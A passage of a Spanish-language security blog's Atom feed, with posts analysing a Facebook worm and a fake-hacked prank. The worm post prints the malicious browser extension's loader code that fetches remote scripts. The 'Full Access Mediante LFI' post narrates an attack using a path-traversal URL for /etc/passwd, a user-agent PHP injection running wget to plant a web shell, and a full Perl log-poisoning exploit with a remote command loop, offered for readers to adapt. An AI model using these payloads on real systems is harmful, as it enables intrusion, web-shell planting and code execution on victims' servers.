/&gt;&lt;iframe src="http://player.vimeo.com/video/34588578?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="500" height="250" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-3897667581730243001?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/3897667581730243001/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=3897667581730243001&amp;isPopup=true" title="2 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/3897667581730243001?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/3897667581730243001?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2012/01/sql-injection-en-eset-latinoamerica.html" title="Sql Injection en ESET LATINOAMERICA" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>2</thr:total></entry><entry gd:etag="W/&quot;CU8BQ3czeip7ImA9WhRWFkQ.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-4677982213231170762</id><published>2012-01-04T07:35:00.000-08:00</published><updated>2012-01-04T08:17:32.982-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-04T08:17:32.982-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking General" /><category scheme="http://www.blogger.com/atom/ns#" term="Virus y Malware" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>Analizando Gusanito Facebook</title><content type="html">Un amigo me pega en el muro modelos se les sale la teta y que no se que y yo WTF!!???&lt;br /&gt;&lt;br /&gt;Entro y me sale esta hermosura:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-HHsG6AYYAMc/TwRzLtZ84iI/AAAAAAAAAAc/BY-RVXH1q10/s1600/plugin.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 272px;" src="http://1.bp.blogspot.com/-HHsG6AYYAMc/TwRzLtZ84iI/AAAAAAAAAAc/BY-RVXH1q10/s400/plugin.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5693802473907348002" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Lo Mas hermosos de esto es que el que lo programó fue bien astuto por que si es un plugin! pongo ver el codigo fuente y veo esto:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;center&amp;gt;&amp;lt;p&amp;gt;Instala el Plugin para reproducir el video&amp;lt;/p&amp;gt;&amp;lt;/center&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;     &amp;lt;div align="left" style="width:550px;height:437px;overflow:hidden;" id="videitos"&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;center&amp;gt; &amp;lt;div id="liframe"&amp;gt;&amp;lt;iframe id="change" width="500" src="http://xxxxxx.com/xxxx.html" height="300" scrolling="no" frameborder="0"&amp;gt;&amp;lt;/iframe&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/center&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Viendo la fuente del archivo xxxx.html encontré esto:&lt;br /&gt;&lt;br /&gt;&amp;lt;script&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') &amp;gt; -1;&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') &amp;gt; -1;&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;function instalar(){&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;if (is_chrome){&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;window.open("http://xxxxx.com/plugin.crx");&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;} else if(is_firefox){&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;var params = {&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;"Youtube Extension": {&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;URL: "http://xxxxx.com/plugin.xpi",&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;toString: function () { return this.URL; }&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;}&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;};&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;InstallTrigger.install(params);&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;} else{&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; window.open("http://www.google.com/chrome/eula.html");&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;}&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;}&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; &amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quise ir un poco mas hayá y levanté mi máquina virtual... instalé mi google chrome y a infectarnos se ha dicho...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Luego fui a:&lt;br /&gt;&lt;br /&gt;C:\Users\1337test\AppData\Local\Google\Chrome\User Data\Default\Extensions&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Busqué la carpeta del plugin y encontré 5 Archivos:&lt;br /&gt;&lt;br /&gt;go.js&lt;br /&gt;icon16.png&lt;br /&gt;icon48.png&lt;br /&gt;icon128.png&lt;br /&gt;manifest.json&lt;br /&gt;&lt;br /&gt;En el go.js encontramos:&lt;br /&gt;&lt;br /&gt;loadScript_YOU();&lt;br /&gt;&lt;br /&gt;function loadScript_YOU() {&lt;br /&gt;&lt;br /&gt; if ('https:' == document.location.protocol) return false;&lt;br /&gt;&lt;br /&gt; var s = document.createElement('script');&lt;br /&gt;&lt;br /&gt; s.setAttribute("type","text/javascript");&lt;br /&gt;&lt;br /&gt; s.setAttribute("src", "http://xxxxxxx.com/script.js");&lt;br /&gt;&lt;br /&gt; var head=document.getElementsByTagName("head")[0];&lt;br /&gt;&lt;br /&gt; if( head==null) return false;&lt;br /&gt;&lt;br /&gt; head.appendChild(s);&lt;br /&gt;&lt;br /&gt; return true;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;En el manifest:&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160; "content_scripts": [ {&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;"all_frames": true,&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;"js": [ "go.js" ],&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;"matches": [ "\u003Call_urls\u003E" ]&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160; } ],&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160; "description": "Reproduce videos online alojados youtube, m\u00E1s r\u00E1pido y eficiente",&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160; "icons": {&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;"128": "icon128.png",&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;"16": "icon16.png",&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;"48": "icon48.png"&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160; },&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160; "key": "xxxxxx",&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160; "name": "Extension YouTube",&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160; "permissions": [ "*://*/*" ],&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160; "update_url": "xxxxxxx",&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160; "version": "1.3.0"&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora lo importante en el go.js encontramos esto:&lt;br /&gt;&lt;br /&gt;s.setAttribute("src", "http://xxxxxxx.com/script.js");&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;vamos a ver que hay dentro:&lt;br /&gt;&lt;br /&gt;(Esto estaba encriptado ahora lo pongo desencriptado):&lt;br /&gt;&lt;br /&gt;function addScript(_0xb530x2) {&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;var _0xb530x3 = document['createElement']('script');&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;_0xb530x3['setAttribute']('type', 'text/javascript');&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;_0xb530x3['setAttribute']('src', _0xb530x2);&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;var _0xb530x4 = document['getElementsByTagName']('script')[0];&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;if (_0xb530x4 == null) {&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;return false;&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;};&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;_0xb530x4['appendChild'](_0xb530x3);&lt;br /&gt;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;return true;&lt;br /&gt;&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;addScript('http://xxxxxxxxx.com/ex.js');&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora vamos a ver que hay en:&lt;br /&gt;&lt;br /&gt;addScript('http://xxxxxxxxx.com/ex.js');&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Y lo que habia era...&lt;br /&gt;&lt;br /&gt;Bueno no voy a poner el codigo porque es su chamba pes su codigo ellos lo programaron está ofuscado aparte pero bueno lo que hace es por metodo post lo publica en el muro de tus amigos diciendo:&lt;br /&gt;&lt;br /&gt;var comment = "Estas chichas se pasan!!! " + etiquetas;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno como se desinfectan? vayan todo para atras.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4677982213231170762?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/4677982213231170762/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=4677982213231170762&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4677982213231170762?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4677982213231170762?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2012/01/analizando-gusanito-facebook.html" title="Analizando Gusanito Facebook" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-HHsG6AYYAMc/TwRzLtZ84iI/AAAAAAAAAAc/BY-RVXH1q10/s72-c/plugin.png" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;A0UDQXczeCp7ImA9WhRWEUs.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-4593175214044416925</id><published>2011-12-29T06:32:00.000-08:00</published><updated>2011-12-29T06:34:30.980-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-29T06:34:30.980-08:00</app:edited><title>Inosentes xD</title><content type="html">Ayer Fue el día de los inosentes y puse el post de hacked por los anonymous -.- no me hackearon en verdad... Varios en las redes sociales me preguntaron si el hackeo fue real xD pues no fue broma por el día de los inosentes... como varios que tienen blogs de seguridad informatica lo hacen.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White xD&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4593175214044416925?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/4593175214044416925/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=4593175214044416925&amp;isPopup=true" title="3 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4593175214044416925?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4593175214044416925?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/12/inosentes-xd.html" title="Inosentes xD" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>3</thr:total></entry><entry gd:etag="W/&quot;D0EESHYyeCp7ImA9WhRVE00.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-8387831320848850614</id><published>2011-12-28T12:19:00.001-08:00</published><updated>2012-01-11T10:13:29.890-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-11T10:13:29.890-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="seguridadblanca" /><title>PWNED By Anonymous Peru</title><content type="html">No Perdonamos No olvidamos Esperanos Te Hackeamos Dr.White&lt;br /&gt;&lt;br /&gt;&lt;a href="http://seguridadblanca.blogspot.com/2011/12/inosentes-xd.html"&gt;inosentes&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-8387831320848850614?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/8387831320848850614/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=8387831320848850614&amp;isPopup=true" title="2 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/8387831320848850614?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/8387831320848850614?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/12/pwned-by-anonymous-peru.html" title="PWNED By Anonymous Peru" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>2</thr:total></entry><entry gd:etag="W/&quot;CEEARH04cSp7ImA9WhRQFUg.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-655921169939150486</id><published>2011-12-10T12:57:00.000-08:00</published><updated>2011-12-10T13:30:45.339-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-10T13:30:45.339-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="LFI" /><category scheme="http://www.blogger.com/atom/ns#" term="shell" /><title>Full Access Mediante LFI</title><content type="html">Hablando con un colega me dijo que me pagaría por encontrarle un error a un .php lo encontré sin embargo estaba dentro del panel asi que no se podría entrar facilmente... ya que no habia forma de bypass al login entonces me mostró un LFI que tenia en la web dije bueno haber como le hacemos... comenzé a darle al LFI para sacar el config.php y nada estaba bloqueada esa wa... la inyeccion era algo asi:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://malicioussub.domain.com/tech/protocolo/algundirmas/funcxxx?ts=../../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno hasta el momento todo iva bien saque el passwd y nada cdsm no habia nada interesante un solo usuario bueno segui intentando y yo siempre saco archivos .php ya sea el index o lo que fuese y de ahi saco el config de ahí voy escalando pero en este caso no se podían sacar los .php aun no estoy seguro por que entonces busqué y dije ya se por medio del phpmyadmin voy a intentar sacar shell haciendo into_outfile o algo por ahi intenté entrar con user: sa y password: sa y nada csm dificil explotar teniendo en cuenta que todo lo que tenía era un lfi y ensima ni sacar los archivos podía me encontré con un archivo .log y ahi me frikie xD mi ip estaba en los logs provando el sa y sa entonces dije wait a minute... yo recuerdo esto:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;intentaré poner algo en el archivo .log...&lt;br /&gt;&lt;br /&gt;con mi popular y muy usado Live Http Headers cambie mi user-agent a &lt;?system('wget http://mipowerhostllenodeshells.txt -O tr0llface.php');?&gt; entonces aparecio en el log pero... por que siempre hay un pero no se ejecutó una busqueda rápida en mis recuerdos me hizo acordar un LFI que exploté hace tiempo en el que usaba eso mismo en el proc/self/environ entonces dije a cierto a ver cambie la url en el navegador puse el mismo user-agent: http://malicioussub.domain.com/tech/protocolo/algundirmas/funcxxx?ts=../../../../../../../../../../../proc/self/environ&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Mother of my fucking god me mostraba un resultado distinto:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HTTP_HOST=sub.domaimn.com HTTP_REFERER=http://subfucking.domain.com/ HTTP_USER_AGENT= PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron &lt;br /&gt;&lt;br /&gt;no salia el user agent visible... procedí a verificar si había subido y si si subio la shell, cuando le comenté del caso a mi colega me dijo que era una buena manera de subir que la conocia pero no se le ocurrio y me hizo acordar que algo parecido se puede hacer con el archivo ../../../../../../../etc/httpd/logs/error_log me encontré también con este exploit:&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl -w&lt;br /&gt;use IO::Socket;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;$site=&amp;quot;victim.com&amp;quot;;&lt;br /&gt;$path=&amp;quot;/folder/&amp;quot;;&lt;br /&gt;$code=&amp;quot;&amp;quot;;&lt;br /&gt;$log = &amp;quot;../../../../../../../etc/httpd/logs/error_log&amp;quot;;&lt;br /&gt;&lt;br /&gt;print &amp;quot;Trying to inject the code&amp;quot;;&lt;br /&gt;&lt;br /&gt;$socket = IO::Socket::INET-&amp;gt;new(Proto=&amp;gt;&amp;quot;tcp&amp;quot;, PeerAddr=&amp;gt;&amp;quot;$site&amp;quot;, PeerPort=&amp;gt;&amp;quot;80&amp;quot;) or die &amp;quot;&lt;br /&gt;Connection Failed.&lt;br /&gt;&lt;br /&gt;&amp;quot;;&lt;br /&gt;print $socket &amp;quot;GET &amp;quot;.$path.$code.&amp;quot; HTTP/1.1&lt;br /&gt;&amp;quot;;&lt;br /&gt;print $socket &amp;quot;User-Agent: &amp;quot;.$code.&amp;quot;&lt;br /&gt;&amp;quot;;&lt;br /&gt;print $socket &amp;quot;Host: &amp;quot;.$site.&amp;quot;&lt;br /&gt;&amp;quot;;&lt;br /&gt;print $socket &amp;quot;Connection: close&lt;br /&gt;&lt;br /&gt;&amp;quot;;&lt;br /&gt;close($socket);&lt;br /&gt;print &amp;quot;&lt;br /&gt;Code $code sucssefully injected in $log&lt;br /&gt;&amp;quot;;&lt;br /&gt;&lt;br /&gt;print &amp;quot;&lt;br /&gt;Type command to run or exit to end: &amp;quot;;&lt;br /&gt;$cmd = ;&lt;br /&gt;&lt;br /&gt;while($cmd !~ &amp;quot;exit&amp;quot;) {&lt;br /&gt;&lt;br /&gt;$socket = IO::Socket::INET-&amp;gt;new(Proto=&amp;gt;&amp;quot;tcp&amp;quot;, PeerAddr=&amp;gt;&amp;quot;$site&amp;quot;, PeerPort=&amp;gt;&amp;quot;80&amp;quot;) or die &amp;quot;&lt;br /&gt;Connection Failed.&lt;br /&gt;&lt;br /&gt;&amp;quot;;&lt;br /&gt;print $socket &amp;quot;GET &amp;quot;.$path.&amp;quot;index.php=&amp;quot;.$log.&amp;quot;&amp;amp;cmd=$cmd HTTP/1.1&lt;br /&gt;&amp;quot;;&lt;br /&gt;print $socket &amp;quot;Host: &amp;quot;.$site.&amp;quot;&lt;br /&gt;&amp;quot;;&lt;br /&gt;print $socket &amp;quot;Accept: */*&lt;br /&gt;&amp;quot;;&lt;br /&gt;print $socket &amp;quot;Connection: close&lt;br /&gt;&lt;br /&gt;&amp;quot;;&lt;br /&gt;&lt;br /&gt;while ($show = &amp;lt;$socket&amp;gt;)&lt;br /&gt;{&lt;br /&gt;print $show;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;print &amp;quot;Type command to run or exit to end: &amp;quot;;&lt;br /&gt;$cmd = ;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;está muy básico sin embargo ahi se los pongo cambien la victim.com el folder y la url del folder y del log xD y en el code la idea es que pongan el system() o passthru() bueno la cosa es como le subí la shell ahi tienen una buena opción de que hacer con un LFI en el caso que los .php estén bloqueados.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-655921169939150486?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/655921169939150486/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=655921169939150486&amp;isPopup=true" title="2 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/655921169939150486?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/655921169939150486?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/12/full-access-mediante-lfi.html" title="Full Access Mediante LFI" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>2</thr:total></entry><entry gd:etag="W/&quot;DUADR3c4fyp7ImA9WhRRF0k.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-5488436891127171983</id><published>2011-11-21T13:58:00.000-08:00</published><updated>2011-12-01T05:56:16.937-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-01T05:56:16.937-08:00</app:edited><title>Pwned AnonymousPeru.com</title><content type="html">Bueno pues lei en el periódico la noticia de un leak de un mail que decia algo sobre nuestra alcaldeza entonces dije a ver si han publicado algo en su página de facebook... me fijé y 